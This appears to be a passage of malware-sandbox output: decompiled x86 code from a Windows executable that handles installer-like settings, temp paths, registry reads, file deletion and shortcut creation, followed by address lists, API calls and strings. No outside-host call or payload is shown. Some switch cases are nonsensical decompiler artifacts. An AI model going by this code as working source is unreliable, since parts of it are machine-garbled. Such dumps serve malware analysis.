											__eax = __ebp - 0x1040;
											__eax = E0041A311(__esi, __ebp - 0x1040);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1040 = SendMessageW(__edi, 0x143, 0, __ebp - 0x1040);
											}
											goto L163;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x1c);
											__eflags = __eax;
											if(__eax == 0) {
												__ebp - 0x10 = __ebp - 0x1040;
												__eax = __ebp - 0x20;
												 *(__ebp - 0x10) = 0x1000;
												RegQueryValueExW( *(__ebp - 0x1c), L"ProgramFilesDir", 0, __ebp - 0x20, __ebp - 0x1040, __ebp - 0x10) = RegCloseKey( *(__ebp - 0x1c));
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eax = 0x7ff;
												__eflags =  *(__ebp - 0x10) - 0x7ff;
												if( *(__ebp - 0x10) < 0x7ff) {
													__eax =  *(__ebp - 0x10);
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1040) = __cx;
											}
											__eflags =  *(__ebp - 0x1040);
											if( *(__ebp - 0x1040) != 0) {
												__eax = __ebp - 0x1040;
												__eax = E0041A0A7(__ebp - 0x1040);
												__eflags =  *((short*)(__ebp + __eax * 2 - 0x1042)) - 0x5c;
												if( *((short*)(__ebp + __eax * 2 - 0x1042)) != 0x5c) {
													__ebp - 0x1040 = E0041A0C1(__ebp - 0x1040, "\\");
													_pop(__ecx);
													_pop(__ecx);
												}
											}
											__edi = E0041A0A7(__edi);
											__eax = __ebp - 0x1040;
											__edi = __edi + E0041A0A7(__ebp - 0x1040);
											__eflags = __edi - 0x7ff;
											if(__edi >= 0x7ff) {
												goto L67;
											} else {
												__ebp - 0x1040 = E0041A0C1(__ebp - 0x1040,  *(__ebp - 0x18));
												goto L66;
											}
										}
										__eflags = __edi->i - 0x3a;
										if(__edi->i == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags = __edi->i - 0x5c;
									if(__edi->i != 0x5c) {
										goto L52;
									}
									_t103 = __edi + 4; // 0x26
									__eax = _t103;
									__eflags =  *__eax;
									if( *__eax == 0) {
										goto L163;
									}
									_push(__eax);
									goto L65;
								}
							case 4:
								__eflags =  *0x440d2c - 1;
								__eflags = __eax - 0x440d2c;
								__edi->i = __edi->i + __ecx;
								__eflags = __edi->i & __dh;
								_push(es);
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x4440) & 0x0000ffff;
								__eax =  *(__ebp - 0x4440) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0x440cdf = 0;
									 *0x440cde = 1;
									goto L163;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x440cdf = 0;
									L83:
									 *0x440cde = 0;
									goto L163;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L163;
								}
								 *0x440cdf = 1;
								goto L83;
							case 6:
								__eflags =  *(__ebp + 0x10) - 4;
								if( *(__ebp + 0x10) != 4) {
									goto L94;
								}
								__eax = __ebp - 0x4440;
								__eax = E0041A311(__ebp - 0x4440, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(0);
								goto L93;
							case 7:
								__eflags =  *(__ebp + 0x10) - 1;
								if(__eflags != 0) {
									L114:
									__eflags =  *(__ebp + 0x10) - 7;
									if( *(__ebp + 0x10) == 7) {
										__eflags =  *0x440d2c;
										if( *0x440d2c == 0) {
											 *0x440d2c = 2;
										}
										 *0x440d28 = 1;
									}
									goto L163;
								}
								__ebp - 0x8c90 = GetTempPathW(__ebx, __ebp - 0x8c90);
								__ebp - 0x8c90 = E00409DEB(__eflags, __ebp - 0x8c90, __ebx);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
								_push(0);
								__esi = L"%s%s%d";
								while(1) {
									_push( *0x42f0c0);
									__ebp - 0x8c90 = __ebp - 0x1040;
									E0040D452(__ebp - 0x1040, __ebx, __esi, __ebp - 0x8c90) = __ebp - 0x1040;
									_push(__ebp - 0x1040);
									__eax = __edi->i();
									__eflags = __eax - 0xffffffff;
									if(__eax == 0xffffffff) {
										break;
									}
									_t152 = __ebp - 0x10;
									 *_t152 =  *(__ebp - 0x10) + 1;
									__eflags =  *_t152;
									_push( *(__ebp - 0x10));
								}
								__ebp - 0x1040 = SetDlgItemTextW( *(__ebp + 8), 0x66, __ebp - 0x1040);
								__eflags =  *(__ebp - 0x4440);
								if( *(__ebp - 0x4440) == 0) {
									goto L163;
								}
								__eflags =  *0x440cfe;
								if( *0x440cfe != 0) {
									goto L163;
								}
								__eax = 0;
								 *(__ebp - 0x1440) = __ax;
								__eax = __ebp - 0x4440;
								__eax = E0041C359(__ebp - 0x4440, 0x2c);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L110:
									__eflags =  *(__ebp - 0x1440);
									if( *(__ebp - 0x1440) == 0) {
										__ebp - 0x1bc90 = __ebp - 0x4440;
										E0041A0EF(__ebp - 0x4440, __ebp - 0x1bc90) = __ebp - 0x19c90;
										__ebp - 0x1440 = E0041A0EF(__ebp - 0x1440, __ebp - 0x19c90);
									}
									__ebp - 0x4440 = E0040CECC(__ebp - 0x4440);
									__eax = 0;
									 *(__ebp - 0x3440) = __ax;
									__ebp - 0x1440 = __ebp - 0x4440;
									__eax = MessageBoxW( *(__ebp + 8), __ebp - 0x4440, __ebp - 0x1440, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L163;
									} else {
										 *0x440cfd = 1;
										 *0x440cea = 1;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L114;
									}
								}
								__ecx = 0;
								__eflags =  *(__ebp - 0x4440) - __cx;
								if( *(__ebp - 0x4440) == __cx) {
									goto L110;
								}
								__eax = __ebp - 0x4440;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__ecx = __ecx + 1;
									__eax = __ebp + __ecx * 2 - 0x4440;
									__eflags =  *__eax;
									if( *__eax != 0) {
										continue;
									}
									goto L110;
								}
								__esi = __ecx + __ecx;
								__ebp + __esi - 0x443e = __ebp - 0x1440;
								__eax = E0041A0EF(__ebp - 0x1440, __ebp + __esi - 0x443e);
								_pop(__ecx);
								__eax = 0;
								__eflags = 0;
								_pop(__ecx);
								 *(__ebp + __esi - 0x4440) = __ax;
								goto L110;
							case 8:
								__eflags =  *(__ebp + 0x10) - 3;
								if( *(__ebp + 0x10) == 3) {
									__eflags =  *(__ebp - 0x4440);
									if(__eflags != 0) {
										__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
									}
									__edi = __ebp + 0xc;
									 *0x440d08 = E0040D61A(__edi, __eflags);
								}
								 *0x440cff = 1;
								goto L163;
							case 9:
								__eflags =  *(__ebp + 0x10) - 5;
								if( *(__ebp + 0x10) != 5) {
									L94:
									 *0x440d10 = 1;
									goto L163;
								}
								_push(1);
								L93:
								_push( *(__ebp + 8));
								__ecx = __ebp - 0x4440;
								__eax = E0040E152(__ecx); // executed
								goto L94;
							case 0xa:
								__eflags =  *(__ebp + 0x10) - 6;
								if( *(__ebp + 0x10) != 6) {
									goto L163;
								}
								__eax = 0;
								 *(__ebp - 0x2440) = __ax;
								__eax =  *(__ebp - 0x1bc90) & 0x0000ffff;
								__eax = E0041CB95( *(__ebp - 0x1bc90) & 0x0000ffff);
								_push(__ebx);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0x43ecd8);
									__eax = __ebp - 0x2440;
									_push(__ebp - 0x2440);
									__eax = E0041078F();
									 *(__ebp - 0x18) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2440;
									if(__eflags == 0) {
										_push(0x43dcd8);
										_push(__eax);
										__eax = E0041078F();
										 *(__ebp - 0x18) = 7;
									} else {
										_push(0x43fcd8);
										_push(__eax);
										__eax = E0041078F();
										 *(__ebp - 0x18) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0xbc90) = __ax;
								 *(__ebp - 0x4c40) = __ax;
								__ebp - 0x19c90 = __ebp - 0x6c88;
								__eax = E0041A0EF(__ebp - 0x6c88, __ebp - 0x19c90);
								__eflags =  *(__ebp - 0x6c88) - 0x22;
								_pop(__ecx);
								_pop(__ecx);
								if( *(__ebp - 0x6c88) != 0x22) {
									__ebp - 0x6c88 = E00409026(__ebp - 0x6c88);
									__eflags = __al;
									if(__al != 0) {
										goto L148;
									}
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
									__eflags =  *(__ebp - 0x6c88);
									__edi = __ebp - 0x6c88;
									if( *(__ebp - 0x6c88) == 0) {
										goto L148;
									} else {
										goto L136;
									}
									do {
										L136:
										__eax = __edi->i & 0x0000ffff;
										__eflags = __ax - 0x20;
										if(__ax == 0x20) {
											L138:
											__esi = __ax & 0x0000ffff;
											__eax = 0;
											__edi->i = __ax;
											__ebp - 0x6c88 = E00409026(__ebp - 0x6c88);
											__eflags = __al;
											if(__al == 0) {
												__edi->i = __si;
												goto L145;
											}
											 *(__ebp - 0x10) = __edi;
											__eflags = __si - 0x2f;
											if(__si != 0x2f) {
												do {
													__edi =  &(__edi->i);
													__edi =  &(__edi->i);
													__eflags = __edi->i - 0x20;
												} while (__edi->i == 0x20);
												_push(__edi);
												__eax = __ebp - 0x4c40;
												L143:
												_push(__eax);
												E0041A0EF() =  *(__ebp - 0x10);
												_pop(__ecx);
												_pop(__ecx);
												 *( *(__ebp - 0x10)) = __si;
												goto L145;
											}
											_push(0x2f);
											_pop(__eax);
											 *(__ebp - 0x4c40) = __ax;
											__eax =  &(__edi->i);
											_push( &(__edi->i));
											__eax = __ebp - 0x4c3e;
											goto L143;
										}
										__eflags = __ax - 0x2f;
										if(__ax != 0x2f) {
											goto L145;
										}
										goto L138;
										L145:
										__edi =  &(__edi->i);
										__edi =  &(__edi->i);
										__eflags = __edi->i;
									} while (__edi->i != 0);
									__eflags =  *(__ebp - 0x10);
									if( *(__ebp - 0x10) != 0) {
										__ecx =  *(__ebp - 0x10);
										__eax = 0;
										__eflags = 0;
										 *( *(__ebp - 0x10)) = __ax;
									}
									goto L148;
								} else {
									__ebp - 0x19c8e = __ebp - 0x6c88;
									E0041A0EF(__ebp - 0x6c88, __ebp - 0x19c8e) = __ebp - 0x6c86;
									__eax = E0041C359(__ebp - 0x6c86, 0x22);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x4c40 = E0041A0EF(__ebp - 0x4c40, __ebp - 0x4c40);
										_pop(__ecx);
										_pop(__ecx);
									}
									L148:
									__esi = 0;
									__eflags =  *((intOrPtr*)(__ebp - 0x11c90)) - __si;
									if( *((intOrPtr*)(__ebp - 0x11c90)) != __si) {
										__ebp - 0xbc90 = __ebp - 0x11c90;
										__eax = E0040A72F(__edi, __ebp - 0x11c90, __ebp - 0xbc90, __ebx);
									}
									__ebp - 0xcc90 = __ebp - 0x6c88;
									__eax = E0040A72F(__edi, __ebp - 0x6c88, __ebp - 0xcc90, __ebx);
									__eflags =  *(__ebp - 0x2440) - __si;
									if(__eflags == 0) {
										__ebp - 0x2440 = E0040CE92(__ecx, __ebp - 0x2440,  *(__ebp - 0x18));
									}
									__ebp - 0x2440 = E00409DEB(__eflags, __ebp - 0x2440, __ebx);
									__eflags =  *((intOrPtr*)(__ebp - 0x17c90)) - __si;
									if(__eflags != 0) {
										__ebp - 0x17c90 = __ebp - 0x2440;
										E004107BC(__eflags, __ebp - 0x2440, __ebp - 0x17c90, __ebx) = __ebp - 0x2440;
										__eax = E00409DEB(__eflags, __ebp - 0x2440, __ebx);
									}
									__ebp - 0x2440 = __ebp - 0xac90;
									__eax = E0041A0EF(__ebp - 0xac90, __ebp - 0x2440);
									_pop(__ecx);
									_pop(__ecx);
									__eax = __ebp - 0x13c90;
									__eflags =  *(__ebp - 0x13c90) - __si;
									if(__eflags == 0) {
										__eax = __ebp - 0x19c90;
									}
									__ebp - 0x2440 = E004107BC(__eflags, __ebp - 0x2440, __ebp - 0x2440, __ebx);
									__eax = __ebp - 0x2440;
									__eflags = E0040A25D(__ebp - 0x2440) - __esi;
									if(__eflags == 0) {
										L158:
										__ebp - 0x2440 = E004107BC(__eflags, __ebp - 0x2440, L".lnk", __ebx);
										goto L159;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L159:
											__ebp - 0x2440 = E004090CB(__ebx, __ecx, __edi, __ebp - 0x2440, 1);
											__ebp - 0xcc90 = __ebp - 0x9c90;
											__eax = E0041A0EF(__ebp - 0x9c90, __ebp - 0xcc90);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0x9c90 = E0040A2E6(__eflags, __ebp - 0x9c90);
											 *(__ebp - 0x4c40) & 0x0000ffff =  ~( *(__ebp - 0x4c40) & 0x0000ffff);
											asm("sbb eax, eax");
											__ecx = __ebp - 0x4c40;
											__eax =  ~( *(__ebp - 0x4c40) & 0x0000ffff) & __ebp - 0x00004c40;
											 *(__ebp - 0xbc90) & 0x0000ffff =  ~( *(__ebp - 0xbc90) & 0x0000ffff);
											asm("sbb ecx, ecx");
											__edx = __ebp - 0xbc90;
											__ecx =  ~( *(__ebp - 0xbc90) & 0x0000ffff) & __ebp - 0x0000bc90;
											 *(__ebp - 0x15c90) & 0x0000ffff =  ~( *(__ebp - 0x15c90) & 0x0000ffff);
											asm("sbb edx, edx");
											__esi = __ebp - 0x15c90;
											__edx =  ~( *(__ebp - 0x15c90) & 0x0000ffff) & __ebp - 0x00015c90;
											 *(__ebp - 0x9c90) & 0x0000ffff =  ~( *(__ebp - 0x9c90) & 0x0000ffff);
											asm("sbb esi, esi");
											__edi = __ebp - 0x9c90;
											__esi =  ~( *(__ebp - 0x9c90) & 0x0000ffff) & __edi;
											__ebp - 0x2440 = __ebp - 0xcc90;
											__eax = E00419655(__ecx, 0, __ebp - 0xcc90, __ebp - 0x2440, __esi,  ~( *(__ebp - 0x15c90) & 0x0000ffff) & __ebp - 0x00015c90, __ecx,  ~( *(__ebp - 0x4c40) & 0x0000ffff) & __ebp - 0x00004c40);
											__eflags =  *(__ebp - 0xac90);
											if( *(__ebp - 0xac90) != 0) {
												__eax = __ebp - 0xac90;
												SHChangeNotify(0x1000, 5, __ebp - 0xac90, 0);
											}
											goto L163;
										}
										goto L158;
									}
								}
							case 0xb:
								__eflags =  *(__ebp + 0x10) - 7;
								if( *(__ebp + 0x10) == 7) {
									 *0x440d30 = 1;
								}
								goto L163;
							case 0xc:
								__eax =  *(__ebp - 0x4440) & 0x0000ffff;
								__eax = E0041CB95( *(__ebp - 0x4440) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0x440cdd = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0x440cdc = 1;
									} else {
										 *0x440cdd = 0;
										 *0x440cdc = 0;
									}
								}
								goto L163;
							case 0xd:
								 *0x440d11 = 1;
								__eax = __eax + 0x440d11;
								__ecx = __ecx + __ebp;
								 *0x7d830000 =  *0x7d830000 ^ __eax;
								__eflags =  *0x7d830000;
								goto L163;
						}
						L4:
						_t274 = E0040D9A5(_t336, _t274,  *(_t354 - 0x10));
						 *(_t354 - 0x10) =  *(_t354 - 0x10) + 0x2000;
						_t15 = _t354 - 0x18;
						 *_t15 =  *((intOrPtr*)(_t354 - 0x18)) - 1;
						if( *_t15 != 0) {
							goto L4;
						} else {
							 *(_t354 - 0x10) =  *(_t354 - 0x10) & 0x00000000;
							goto L6;
						}
						L163:
						_t347 = _t354 - 0xec90;
						_t271 = E0040D46E(_t354 - 0x11, _t354 - 0xec90, _t352,  *((intOrPtr*)(_t354 + 0xc)), _t354 - 0x4440, _t354 + 0xf, 0x1000);
						 *((intOrPtr*)(_t354 + 0xc)) = _t271;
					} while (_t271 != 0);
				}
			}

0x0040e587
0x0040e591
0x0040e59a
0x0040f15f
0x0040f162
0x0040f16a
0x0040f16a
0x0040e5bc
0x0040e5c1
0x0040e5c6
0x0040e5cd
0x0040e5d4
0x0040e5d4
0x0040e5da
0x0040e5e0
0x0040e5e5
0x0040e5eb
0x0040e5ee
0x0040e5ee
0x00000000
0x0040e60e
0x0040e628
0x0040e62f
0x00000000
0x0040e631
0x00000000
0x0040e631
0x0040e62f
0x0040e63a
0x00000000
0x00000000
0x0040e643
0x00000000
0x0040e64a
0x0040e64e
0x00000000
0x00000000
0x0040e65c
0x0040e677
0x0040e682
0x0040e687
0x0040e698
0x0040e6a3
0x0040e6a8
0x0040e6b7
0x0040e6bc
0x0040e6be
0x0040e81d
0x0040e81d
0x0040e827
0x00000000
0x0040e6c4
0x0040e6c4
0x0040e6c9
0x0040e6d2
0x0040e6d8
0x0040e6df
0x0040e787
0x0040e78e
0x0040e790
0x0040e793
0x00000000
0x00000000
0x0040e79c
0x0040e7a2
0x0040e7a4
0x00000000
0x0040e7a6
0x0040e7a6
0x0040e7a9
0x0040e7aa
0x0040e7b2
0x0040e7c2
0x0040e7c7
0x0040e7d1
0x0040e7d3
0x0040e7d6
0x0040e7ac
0x0040e7ac
0x0040e7ac
0x0040e7af
0x00000000
0x0040e7d8
0x0040e7e6
0x0040e7ec
0x0040e7ee
0x0040e7fb
0x0040e7fb
0x00000000
0x0040e7ee
0x0040e7d6
0x0040e7a4
0x0040e6f4
0x0040e701
0x0040e70d
0x0040e713
0x0040e716
0x0040e719
0x0040e72d
0x0040e734
0x0040e739
0x0040e73b
0x00000000
0x00000000
0x0040e741
0x0040e748
0x0040e74d
0x0040e751
0x0040e75e
0x0040e763
0x0040e766
0x0040e768
0x0040e769
0x0040e773
0x0040e77a
0x0040e781
0x00000000
0x0040e781
0x0040e722
0x0040e728
0x0040e72b
0x00000000
0x00000000
0x00000000
0x0040e801
0x0040e801
0x0040e810
0x0040e815
0x0040e815
0x00000000
0x0040e6c9
0x00000000
0x0040e831
0x0040e835
0x0040e83b
0x0040e840
0x0040e842
0x0040e846
0x0040e84a
0x0040e852
0x0040e857
0x0040e858
0x0040e858
0x0040e859
0x0040e85d
0x0040e867
0x0040e86f
0x0040e85f
0x0040e85f
0x0040e85f
0x0040e871
0x0040e875
0x0040e887
0x0040e877
0x0040e877
0x0040e877
0x0040e88a
0x0040e88f
0x0040e895
0x0040e896
0x0040e89c
0x0040e8a1
0x0040e8a4
0x0040e8a8
0x0040e8ad
0x0040e8af
0x0040e8af
0x0040e8b1
0x0040e8b1
0x0040e8b6
0x0040e8bb
0x0040e8bf
0x0040e8c0
0x0040e8c1
0x0040e8c7
0x0040e8c8
0x0040e8cd
0x0040e8cd
0x0040e8c1
0x00000000
0x00000000
0x0040e8d3
0x0040e8d7
0x0040e8e7
0x0040e8e7
0x00000000
0x00000000
0x0040e8f2
0x0040e8f6
0x00000000
0x00000000
0x0040e8fc
0x0040e904
0x00000000
0x00000000
0x0040e90a
0x0040e90c
0x0040e914
0x0040e91a
0x0040e91d
0x0040e924
0x0040e926
0x0040e92c
0x0040e92c
0x0040e930
0x0040e936
0x0040e938
0x00000000
0x0040e93e
0x0040e93e
0x0040e941
0x0040e945
0x0040e961
0x0040e961
0x0040e965
0x0040ea46
0x0040ea46
0x0040ea47
0x0040ea47
0x0040ea4d
0x0040ea4e
0x0040ea53
0x0040ea53
0x0040ea54
0x0040ea55
0x0040ea55
0x0040ea5e
0x0040ea63
0x0040ea64
0x0040ea65
0x0040ea67
0x0040ea69
0x0040ea6e
0x0040ea70
0x0040ea70
0x0040ea72
0x0040ea72
0x0040ea6e
0x0040ea7d
0x0040ea82
0x0040ea83
0x0040ea8c
0x0040ea9c
0x0040eaa6
0x0040eab5
0x0040eabb
0x0040eac3
0x0040eac8
0x0040eac9
0x0040eaca
0x0040eacc
0x0040eae1
0x0040eae1
0x00000000
0x0040eacc
0x0040e96b
0x0040e96e
0x0040e97b
0x0040e97b
0x0040e98d
0x0040e993
0x0040e995
0x0040e99b
0x0040e9a2
0x0040e9b0
0x0040e9c0
0x0040e9c6
0x0040e9c9
0x0040e9ce
0x0040e9d1
0x0040e9d3
0x0040e9d3
0x0040e9d6
0x0040e9d6
0x0040e9d8
0x0040e9d8
0x0040e9e0
0x0040e9e8
0x0040e9ea
0x0040e9f1
0x0040e9f6
0x0040ea00
0x0040ea0e
0x0040ea13
0x0040ea14
0x0040ea14
0x0040ea00
0x0040ea1b
0x0040ea1d
0x0040ea29
0x0040ea2d
0x0040ea33
0x00000000
0x0040ea35
0x0040ea3f
0x00000000
0x0040ea3f
0x0040ea33
0x0040e970
0x0040e975
0x00000000
0x00000000
0x00000000
0x0040e975
0x0040e947
0x0040e94c
0x00000000
0x00000000
0x0040e94e
0x0040e94e
0x0040e951
0x0040e955
0x00000000
0x00000000
0x0040e95b
0x00000000
0x0040e95b
0x00000000
0x0040eaec
0x0040eaed
0x0040eaf2
0x0040eaf4
0x0040eaf6
0x0040eaf7
0x0040eaf7
0x00000000
0x0040eb2d
0x0040eb34
0x0040eb34
0x0040eb37
0x0040eb64
0x0040eb64
0x0040eb6b
0x00000000
0x0040eb6b
0x0040eb39
0x0040eb39
0x0040eb3c
0x0040eb51
0x0040eb58
0x0040eb58
0x00000000
0x0040eb58
0x0040eb3e
0x0040eb3e
0x0040eb3f
0x00000000
0x00000000
0x0040eb41
0x0040eb41
0x0040eb42
0x00000000
0x00000000
0x0040eb48
0x00000000
0x00000000
0x0040ebba
0x0040ebbe
0x00000000
0x00000000
0x0040ebc0
0x0040ebcc
0x0040ebd1
0x0040ebd2
0x0040ebd3
0x0040ebd5
0x00000000
0x00000000
0x0040ebd7
0x00000000
0x00000000
0x0040ebff
0x0040ec03
0x0040ed7a
0x0040ed7a
0x0040ed7e
0x0040ed84
0x0040ed8b
0x0040ed8d
0x0040ed8d
0x0040ed97
0x0040ed97
0x00000000
0x0040ed7e
0x0040ec11
0x0040ec1f
0x0040ec24
0x0040ec28
0x0040ec2a
0x0040ec37
0x0040ec37
0x0040ec45
0x0040ec55
0x0040ec5b
0x0040ec5c
0x0040ec5e
0x0040ec61
0x00000000
0x00000000
0x0040ec31
0x0040ec31
0x0040ec31
0x0040ec34
0x0040ec34
0x0040ec6f
0x0040ec75
0x0040ec7d
0x00000000
0x00000000
0x0040ec83
0x0040ec8a
0x00000000
0x00000000
0x0040ec90
0x0040ec92
0x0040ec99
0x0040eca2
0x0040eca7
0x0040eca8
0x0040eca9
0x0040ecab
0x0040ecf7
0x0040ecf7
0x0040ecff
0x0040ed08
0x0040ed14
0x0040ed22
0x0040ed27
0x0040ed31
0x0040ed36
0x0040ed38
0x0040ed48
0x0040ed52
0x0040ed58
0x0040ed5b
0x00000000
0x0040ed61
0x0040ed66
0x0040ed6d
0x0040ed74
0x00000000
0x0040ed74
0x0040ed5b
0x0040ecad
0x0040ecaf
0x0040ecb6
0x00000000
0x00000000
0x0040ecb8
0x0040ecbe
0x0040ecbe
0x0040ecc2
0x00000000
0x00000000
0x0040ecc4
0x0040ecc5
0x0040eccc
0x0040ecd0
0x00000000
0x00000000
0x00000000
0x0040ecd2
0x0040ecd4
0x0040ecdf
0x0040ece6
0x0040eceb
0x0040ecec
0x0040ecec
0x0040ecee
0x0040ecef
0x00000000
0x00000000
0x0040eda3
0x0040eda7
0x0040eda9
0x0040edb1
0x0040edbd
0x0040edbd
0x0040edc3
0x0040edcb
0x0040edcb
0x0040edd0
0x00000000
0x00000000
0x0040eddc
0x0040ede0
0x0040ebe7
0x0040ebe7
0x00000000
0x0040ebe7
0x0040ede6
0x0040ebd9
0x0040ebd9
0x0040ebdc
0x0040ebe2
0x00000000
0x00000000
0x0040eded
0x0040edf1
0x00000000
0x00000000
0x0040edf7
0x0040edf9
0x0040ee00
0x0040ee08
0x0040ee0e
0x0040ee0f
0x0040ee12
0x0040ee47
0x0040ee4c
0x0040ee52
0x0040ee53
0x0040ee58
0x0040ee14
0x0040ee14
0x0040ee17
0x0040ee1d
0x0040ee33
0x0040ee38
0x0040ee39
0x0040ee3e
0x0040ee1f
0x0040ee1f
0x0040ee24
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee1d
0x0040ee5f
0x0040ee61
0x0040ee68
0x0040ee76
0x0040ee7d
0x0040ee82
0x0040ee8a
0x0040ee8b
0x0040ee8c
0x0040eedd
0x0040eee2
0x0040eee4
0x00000000
0x00000000
0x0040eeea
0x0040eeee
0x0040eef6
0x0040eefc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040eefe
0x0040eefe
0x0040eefe
0x0040ef01
0x0040ef05
0x0040ef0d
0x0040ef0d
0x0040ef10
0x0040ef12
0x0040ef1c
0x0040ef21
0x0040ef23
0x0040ef63
0x00000000
0x0040ef63
0x0040ef25
0x0040ef28
0x0040ef2c
0x0040ef44
0x0040ef44
0x0040ef45
0x0040ef46
0x0040ef46
0x0040ef4c
0x0040ef4d
0x0040ef53
0x0040ef53
0x0040ef59
0x0040ef5c
0x0040ef5d
0x0040ef5e
0x00000000
0x0040ef5e
0x0040ef2e
0x0040ef30
0x0040ef31
0x0040ef38
0x0040ef3b
0x0040ef3c
0x00000000
0x0040ef3c
0x0040ef07
0x0040ef0b
0x00000000
0x00000000
0x00000000
0x0040ef66
0x0040ef66
0x0040ef67
0x0040ef68
0x0040ef68
0x0040ef6e
0x0040ef72
0x0040ef74
0x0040ef77
0x0040ef77
0x0040ef79
0x0040ef79
0x00000000
0x0040ee8e
0x0040ee95
0x0040eea1
0x0040eeaa
0x0040eeb2
0x0040eeb4
0x0040eeba
0x0040eebc
0x0040eeca
0x0040eecf
0x0040eed0
0x0040eed0
0x0040ef7c
0x0040ef7c
0x0040ef7e
0x0040ef85
0x0040ef8f
0x0040ef96
0x0040ef96
0x0040efa3
0x0040efaa
0x0040efaf
0x0040efb6
0x0040efc2
0x0040efc2
0x0040efcf
0x0040efd4
0x0040efdb
0x0040efe5
0x0040eff2
0x0040eff9
0x0040eff9
0x0040f005
0x0040f00c
0x0040f011
0x0040f012
0x0040f013
0x0040f019
0x0040f020
0x0040f022
0x0040f022
0x0040f037
0x0040f03c
0x0040f048
0x0040f04a
0x0040f05b
0x0040f068
0x00000000
0x0040f04c
0x0040f057
0x0040f059
0x0040f06d
0x0040f076
0x0040f082
0x0040f089
0x0040f08e
0x0040f08f
0x0040f097
0x0040f0a3
0x0040f0a5
0x0040f0a7
0x0040f0ad
0x0040f0b6
0x0040f0b8
0x0040f0ba
0x0040f0c0
0x0040f0c9
0x0040f0cb
0x0040f0cd
0x0040f0d3
0x0040f0de
0x0040f0e1
0x0040f0e3
0x0040f0e9
0x0040f0f3
0x0040f0fc
0x0040f101
0x0040f109
0x0040f10d
0x0040f11b
0x0040f11b
0x00000000
0x0040f109
0x00000000
0x0040f059
0x0040f04a
0x00000000
0x0040f123
0x0040f127
0x0040f129
0x0040f129
0x00000000
0x00000000
0x0040eb77
0x0040eb7f
0x0040eb85
0x0040eb88
0x0040ebae
0x0040eb8a
0x0040eb8a
0x0040eb8d
0x0040eba2
0x0040eb8f
0x0040eb8f
0x0040eb96
0x0040eb96
0x0040eb8d
0x00000000
0x00000000
0x0040ebf3
0x0040ebf4
0x0040ebf9
0x0040ebfb
0x0040ebfb
0x00000000
0x00000000
0x0040e5f5
0x0040e5f9
0x0040e5fe
0x0040e605
0x0040e605
0x0040e608
0x00000000
0x0040e60a
0x0040e60a
0x00000000
0x0040e60a
0x0040f130
0x0040f146
0x0040f14c
0x0040f151
0x0040f154
0x0040f15e

APIs

__EH_prolog.LIBCMT ref: 0040E587

Part of subcall function 0040D46E: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0040D51C

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,745DBB20,?,0040F26C,?,00000003), ref: 0040E6D2
_wcslen.LIBCMT ref: 0040E70D
_wcslen.LIBCMT ref: 0040E722
_wcslen.LIBCMT ref: 0040E748
_memset.LIBCMT ref: 0040E75E
SHFileOperationW.SHELL32 ref: 0040E781
GetFileAttributesW.KERNEL32(?), ref: 0040E78E
DeleteFileW.KERNEL32(?), ref: 0040E79C
_wcscat.LIBCMT ref: 0040E852
_wcslen.LIBCMT ref: 0040E88A
_realloc.LIBCMT ref: 0040E89C
_wcscat.LIBCMT ref: 0040E8B6
SetWindowTextW.USER32(?,?), ref: 0040E8E7
_wcslen.LIBCMT ref: 0040E930
_wcscpy.LIBCMT ref: 0040EA4E
_wcsrchr.LIBCMT ref: 0040EA5E
_wcscpy.LIBCMT ref: 0040EA7D
GetDlgItem.USER32 ref: 0040EA96
SetWindowTextW.USER32(00000000,?), ref: 0040EAA6
SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040EAB5
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EAE1

Strings

<br>, xrefs: 0040E84C
ProgramFilesDir, xrefs: 0040E9A8
C:\Users\user\AppData\Roaming, xrefs: 0040E5E0
", xrefs: 0040E90C
%s.%d.tmp, xrefs: 0040E6C4, 0040E7B9, 0040EA7C, 0040EAAC, 0040EAC2
\, xrefs: 0040E9F6
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040E983

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

